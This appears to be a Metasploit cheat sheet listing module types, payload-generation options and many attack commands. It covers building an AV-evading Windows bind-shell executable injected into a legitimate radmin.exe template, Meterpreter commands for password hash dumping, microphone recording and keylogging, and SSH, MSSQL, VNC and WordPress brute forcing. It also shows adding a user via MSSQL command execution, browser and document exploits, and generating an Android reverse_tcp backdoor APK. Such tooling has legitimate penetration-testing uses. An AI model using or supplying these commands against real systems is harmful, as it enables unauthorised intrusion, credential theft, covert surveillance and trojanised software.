Module types
exploits: modules that attack a specific vulnerability; each exploit module corresponds to the attack method for one concrete vulnerability
payload: the code or instructions that actually run on the target system after a successful exploit
auxiliary: helper modules for information gathering, enumeration, fingerprinting, scanning and similar tasks
encoders: modules that encode the payload to evade AV detection
nops: modules that improve payload reliability and pad it to the required size
Common generate options:
-b remove bad characters, e.g. -b '\x00\xff'
-e set the encoder; list all available encoders with show encoders
-f output format; defaults to Ruby if not set, e.g. -f c or -f exe
-i number of encoding iterations, usually used for multi-pass encoding to evade AV
-k keep the template's original behaviour and inject the payload into the process as a separate thread; usually combined with -x
-o output file name
-x use the given file as the template
use payload/windows/shell_bind_tcp
generate -b '\x00\xff' -f exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -o 1.exe
Meterpreter commands
background: return to msfconsole (the session stays open in the background)
pwd, lpwd, ls, cat
execute: run a program
getuid
hashdump
ps
record_mic: record from the microphone
webcam_list: enumerate webcams
Host discovery module: auxiliary/scanner/discovery/arp_sweep
Port scan module: auxiliary/scanner/portscan/syn
Password sniffing: use auxiliary/sniffer/psnuffle - supports extracting passwords from pcap capture files; currently only POP3, IMAP, FTP and HTTP GET are supported.
SNMP scanning
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/snmp/snmp_enumusers (Windows)
use auxiliary/scanner/snmp/snmp_enumshares (Windows)
SMB version scan
use auxiliary/scanner/smb/smb_version
Scan named pipes to determine the SMB service type (requires account and password)
use auxiliary/scanner/smb/pipe_auditor
Scan for DCERPC services reachable through SMB named pipes
use auxiliary/scanner/smb/pipe_dcerpc_auditor
SMB share enumeration (account and password)
use auxiliary/scanner/smb/smb_enumshares
SMB user enumeration (account and password)
use auxiliary/scanner/smb/smb_enumusers
SID enumeration (account and password)
use auxiliary/scanner/smb/smb_lookupsid
SSH version scan
use auxiliary/scanner/ssh/ssh_version
SSH password brute force
use auxiliary/scanner/ssh/ssh_login
SSH public-key login
use auxiliary/scanner/ssh/ssh_login_pubkey
Missing Windows patches
use post/windows/gather/enum_patches
MSSQL port scan
TCP 1433 (may be a dynamic port); UDP 1434 (used to query the TCP port number)
use auxiliary/scanner/mssql/mssql_ping
MSSQL password brute force
use auxiliary/scanner/mssql/mssql_login
Remote command execution
use auxiliary/scanner/mssql/mssql_exec
set CMD net user user pass /ADD
FTP version scan
use auxiliary/scanner/ftp/ftp_version
use auxiliary/scanner/ftp/anonymous
use auxiliary/scanner/ftp/ftp_login
Vulnerability scanning
VNC password cracking
use auxiliary/scanner/vnc/vnc_login
VNC access without authentication
use auxiliary/scanner/vnc/vnc_none_auth
RDP (Remote Desktop) vulnerability
use auxiliary/scanner/rdp/ms12_020_check
The check does not trigger a DoS
Device backdoors
use auxiliary/scanner/ssh/juniper_backdoor
use auxiliary/scanner/ssh/fortinet_backdoor
VMware ESXi password brute force
use auxiliary/scanner/vmware/vmauthd_login
use auxiliary/scanner/vmware/vmware_enum_vms
Using the web API
use auxiliary/admin/vmware/poweron_vm
HTTP vulnerability scanning
Expired certificates: use auxiliary/scanner/http/cert
List directories and files: use auxiliary/scanner/http/dir_listing
use auxiliary/scanner/http/files_dir
WebDAV Unicode-encoding authentication bypass: use auxiliary/scanner/http/dir_webdav_unicode_bypass
Tomcat manager login: use auxiliary/scanner/http/tomcat_mgr_login
HTTP verb based authentication bypass: use auxiliary/scanner/http/verb_auth_bypass
WordPress password brute force: use auxiliary/scanner/http/wordpress_login_enum
set URI /wordpress/wp-login.php
Executing a payload via an Acrobat Reader vulnerability
Build a PDF file: exploit/windows/fileformat/adobe_utilprintf
Build a malicious website: exploit/windows/browser/adobe_utilprintf
Meterpreter
use priv
run post/windows/capture/keylog_recorder
Executing a payload via a Flash plugin vulnerability
use exploit/multi/browser/adobe_flash_hacking_team_uaf
use exploit/multi/browser/adobe_flash_opaque_background_uaf
use auxiliary/server/browser_autopwn2
Executing a payload via an IE browser vulnerability
use exploit/windows/browser/ms14_064_ole_code_execution (Windows XP)
Executing a payload via a JRE vulnerability
use exploit/multi/browser/java_jre17_driver_manager
use exploit/multi/browser/java_jre17_jmxbean
use exploit/multi/browser/java_jre17_reflection_types
Generating an Android backdoor
use payload/android/meterpreter/reverse_tcp
generate -f a.apk -p android -t raw